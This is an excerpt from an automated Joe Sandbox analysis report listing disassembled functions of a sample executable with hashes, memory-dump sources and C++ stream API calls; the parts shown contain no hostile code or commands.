Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e56559d32143294df18fcb3f06836c56c6a50a9099051d8b58257210e4906dd7
Instruction ID: 9468fb5da763af319dcfbc595fcf7cabf227c8b1abe2b47a8aad50e1267dbb1f
Opcode Fuzzy Hash: e56559d32143294df18fcb3f06836c56c6a50a9099051d8b58257210e4906dd7
Instruction Fuzzy Hash: FDF1D923D28B8D55E212A63398424BAF260BFBF3C4F6DEB22FD44355B1DF286591E510

Function 00007FF7865EE680 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e62e9768c4b7d9ebd90fcf672ed0911d0ffdc2bc6b7ec08736c44369b529a20b
Instruction ID: 6797da9aa91aa9ccddfb05d1c4a45515dc2d50f89b6e0149dcc1381e52c02f4f
Opcode Fuzzy Hash: e62e9768c4b7d9ebd90fcf672ed0911d0ffdc2bc6b7ec08736c44369b529a20b
Instruction Fuzzy Hash: 23D1DD37C1879D95E652A637E8420B6F390BF7E341F6DDB32E948720A1DB247A85C620

Function 00007FF7865F0960 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d6dab013597353d29ce7371f126fb81377ed1b338f44294501ba794004554e1
Instruction ID: 4bcf73ea888b92e489ab80092d3b49f6236a4172d7653f4e87ec8ff5031a61e9
Opcode Fuzzy Hash: 4d6dab013597353d29ce7371f126fb81377ed1b338f44294501ba794004554e1
Instruction Fuzzy Hash: C1A1F472D0A24A56E657A533D96237AE6807F2A784F7CCB36DD0C33C91DF297894C620

Function 00007FF7865F6ED0 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dbd8b444158c471a74cfaf9cfe530617b902bfb49a01d84fc162881d71c4006
Instruction ID: 78a05b0b07d82027544ef796688e843d4bda953177543a2a06189a0e29af178a
Opcode Fuzzy Hash: 7dbd8b444158c471a74cfaf9cfe530617b902bfb49a01d84fc162881d71c4006
Instruction Fuzzy Hash: 81A1D132A18AD49EE701DF7AD4412FDBBB0BB49349F648325EF4532A65DB386981CB10

Function 00007FF7865F4820 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
Instruction ID: 39106d23098d48e51d1575eb83840c78965102d3bbcb8fb7038a0b7b7c5db960
Opcode Fuzzy Hash: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
Instruction Fuzzy Hash: 725117A6B284B147DA109F2AD8816BC77D1E746B43FE48076D65882F92C52EC50ADF30

Function 00007FF786601690 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08bc665d7d74957357dfb2865b53844b73cc3dd795c035b4743b64fb389cc0bd
Instruction ID: df48c4bb6e511f22f4ee92146fd74705281a64b3694a4daab5e958b7892bc084
Opcode Fuzzy Hash: 08bc665d7d74957357dfb2865b53844b73cc3dd795c035b4743b64fb389cc0bd
Instruction Fuzzy Hash: 7F41BB21F4D399D1E521B563994017AE293BF6A780FB8C732DD5C37A84DB38F881DA01

Function 00007FF78662C110 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d406a45ebeab2dfcb8c903a12aa031135c655f79b932f30f18ed0330c4a30bac
Instruction ID: 53855e27d0a5ced7837c0220750abf2b015fb6335923171befd35c1fe2738d41
Opcode Fuzzy Hash: d406a45ebeab2dfcb8c903a12aa031135c655f79b932f30f18ed0330c4a30bac
Instruction Fuzzy Hash: 30416373B1158487E78CCE2AC8166AE73A3B399304F95C239DA0A87385DA359905CB44

Function 00007FF7865E24F0 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e620470d19bf88a54e58a3ff6a60801cd6e360028fe19ccb035e9b9c1eaf177f
Instruction ID: 9b5d14dbf28be45a5e2c65484f783f79abda70775993ef5bf2f2ea902b64f5a4
Opcode Fuzzy Hash: e620470d19bf88a54e58a3ff6a60801cd6e360028fe19ccb035e9b9c1eaf177f
Instruction Fuzzy Hash: 4131243B724A5657EF488634E922B797691F341300FC9A639EE4AC66C6DB2CD811C710

Function 00007FF78662D730 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93d099d0a7a09c573673c3b0691e11a081a65ef6266a5134ff14cdfb100920a0
Instruction ID: 79abcf9a709a6c4f07366a4eecbdb8b808bafd1d63576f02701c59a775b7409b
Opcode Fuzzy Hash: 93d099d0a7a09c573673c3b0691e11a081a65ef6266a5134ff14cdfb100920a0
Instruction Fuzzy Hash: DAA00131A0889AE0E64AAB80AD50023A232FB90304FA00031D40D411A0DF6CA804CA21

Function 00007FF786613420 Relevance: 99.2, APIs: 66, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.VCRUNTIME140 ref: 00007FF786613450

Part of subcall function 00007FF786629540: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF78662957B
Part of subcall function 00007FF786629540: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF78662959A
Part of subcall function 00007FF786629540: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7866295CC
Part of subcall function 00007FF786629540: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7866295E7
Part of subcall function 00007FF786629540: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF786629633

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF78661346F
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF78661347F
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613491
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866134A1
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866134B3
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866134C3
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866134D5
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866134E5
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF7866134F6
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613506
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF786613517
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613527
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF786613538
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613548
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF78661355A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF78661356A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF78661357B
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF78661358B
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF78661359D
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866135AD
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF7866135BE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866135CE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866135E0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866135F0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613602
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613612
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613624
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613634
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613646
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613656
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613668
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613678
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF78661368A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF78661369A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866136AC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866136BC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866136CE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866136DE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866136F0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613700
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613712
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613722
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613734
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613744
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613756
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613766
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF786613779
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613789
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF78661379C
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866137AC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866137BE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866137CE
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF7866137E0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7866137F0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613802
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613812
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613824
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613834
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF786613845
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613855
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF786613867
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF786613877

Part of subcall function 00007FF786629C80: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF78662952A,?,?,?,00007FF7866299D4), ref: 00007FF786629CE0
Part of subcall function 00007FF786629C80: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF78662952A,?,?,?,00007FF7866299D4), ref: 00007FF786629D02

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7866138A5
??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7866138E3
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7866138ED

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V01@@$V01@_$?setstate@?$basic_ios@Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@D@std@@@1@_V?$basic_streambuf@fclosememset
String ID:
API String ID: 764698701-0
Opcode ID: 07a40512b24c379d44fb5fc842dc0a87102015f34b6abbad548329207398b791
Instruction ID: 4ba898dd78569cd640597092805b13debfda899718767b574f3fcab4107f52f2
Opcode Fuzzy Hash: 07a40512b24c379d44fb5fc842dc0a87102015f34b6abbad548329207398b791
Instruction Fuzzy Hash: 53E1D724F29ACBA3EB40AB51ED54476A763FF85B45FE45032E44E02265DE2CED0DCB21

Function 00007FF786613980 Relevance: 52.7, APIs: 35, Instructions: 151COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF7866139B0
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A00
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A12
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A24
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A36
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A48
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A5A
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A6C
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613A7E
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613A90
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AA2
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613AB4
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AC6
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AD8
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AEA
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613AFC
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B0E
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B20
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B32
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B44
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B56
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B68
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B7A
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613B8C
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF786613B9E
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF786613BB0
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613BC2
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613BD4
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613BE6
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613BF8
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF786613C0A
??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF786613C1C

Part of subcall function 00007FF786629C80: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF78662952A,?,?,?,00007FF7866299D4), ref: 00007FF786629CE0
Part of subcall function 00007FF786629C80: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF78662952A,?,?,?,00007FF7866299D4), ref: 00007FF786629D02

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF786613C4A
??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF786613C81
